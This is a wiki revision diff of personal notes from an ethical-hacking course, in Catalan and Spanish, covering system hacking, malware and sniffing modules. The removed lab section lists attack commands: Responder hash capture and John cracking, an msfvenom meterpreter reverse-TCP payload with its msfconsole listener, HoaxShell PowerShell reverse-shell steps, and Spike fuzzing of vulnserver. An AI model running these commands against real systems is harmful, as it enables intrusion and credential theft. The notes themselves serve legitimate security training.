Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

Ambdós costats versió prèvia Revisió prèvia
Següent revisió
Revisió prèvia
info:cursos:pue:ethical-hacker:sesion2 [18/02/2025 07:46] – [lab 2: Perform Privilege Escalation to Gain Higher Privileges] mateinfo:cursos:pue:ethical-hacker:sesion2 [20/02/2025 23:51] (actual) mate
Línia 3: Línia 3:
  
 == clase == clase
-  * Modulo 06+  * ASPEN 
 +    * Modulo 06 - System Hacking 
 +    * Modulo 07 - Malware 
 +    * Modulo 08 - Sniffing
  
 === Modulo 06, apuntes === Modulo 06, apuntes
  
  
-=== Modulo 06+=== Modulo 06 - System Hacking
 ==== sección 1 ==== sección 1
   * hash   * hash
Línia 149: Línia 152:
   * ''history''   * ''history''
  
-=== Lab 1: Sytem hacking 
-==== task 1: Gain Access to the System 
-  - ''sudo responder -I eth0'' -> capturar hash máquina W11 en txt -> hash.txt 
-  - ''john hash.txt'' -> desencripta la contraseña del hash 
- 
-==== task 2: Gain Access to a Remote System using Reverse Shell Generator 
-===== cmd 
-  * ''docker run -d -p 80:80 reverse_shell_generator'' 
-  * ''http://localhost'' 
-    * IP, Port, MSFVenom -> genera instrucción: ''msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe'' 
-    * se genera un EXE - payload (que hemos de conseguir que ejecute la víctima) 
-    * generamos la instrucción para escuchar el payload, en la sección LISTENER, modo **msfconsole** 
-      * ''msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit"'' 
-    * ejecutamos el listener, ejecutamos el payload 
-      * ''getuid'' 
- 
-===== powershell 
-  * ''http://localhost'' 
-    * HoaxShell -> PowerShell IEX -> cambiar puerto en el script generado por 444 
-    * copiar y guardar en shell.ps1 
-    * ir a la sección **listener** y generar para HoaxShell (puerto 444) 
-    * ejecutar instrucción generada con sudo: ''sudo python...'' 
-    * ejecutamos en un powershell subido a Administrador el script .ps1 
- 
-==== Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System 
-  * ejecutar como administrador ''vulnserver'' (buffer overflow tools) 
-  * instalar **ImmunityDebugger_1_85_setup.exe** (y Python 2.7) 
-  * ejecutar como administrador 
-    * File -> Attach -> vulnserver <- pausado 
-    * Icono PLAY 
-  * en Linux, ejecutamos ''nc -nv 10.10.1.11 9999'' 
-    * HELP nos lista los comandos disponibles 
-    * QUIT para salir 
-    * creamos un "spike template" -> ''pluma stats.spk'':<code>s_readline(); 
- 
-s_string(“STATS ”); 
- 
-s_string_variable(“0”);</code> 
-    * ''generic_send_tcp 10.10.1.11 9999 stats.spk 0 0'' 
-      * los dos últimos ceros son SKIPVAR y SKIPSTR 
-    * ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable 
-    * Se hace lo mismo cambiando **STAT** por **TRUN** 
-    * PENDIENTE 
  
 === Modulo 7: malware === Modulo 7: malware
Línia 247: Línia 207:
  
  
-=== lab 2: Perform Privilege Escalation to Gain Higher Privileges 
-==== Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys 
  
 === Modulo 8: sniffing === Modulo 8: sniffing
Línia 273: Línia 231:
   * IRDP Spoofing   * IRDP Spoofing
   * VLAN Hopping   * VLAN Hopping
 +    * ver todas las VLAN
 +  * STP Attack
 +  * DNS Poisoning
 +    * punto débil de internet
 +    * https://blog.cloudflare.com/es-es/oblivious-dns/
 +  * Detección
 +    * modo promíscuo
 +    * nmap detecta (script)
 +
 +
 +== Examen
 +  * udemy test
 +  * examtopics (pago)
 +  * ProxMox
  • info/cursos/pue/ethical-hacker/sesion2.1739893570.txt.gz
  • Darrera modificació: 18/02/2025 07:46
  • per mate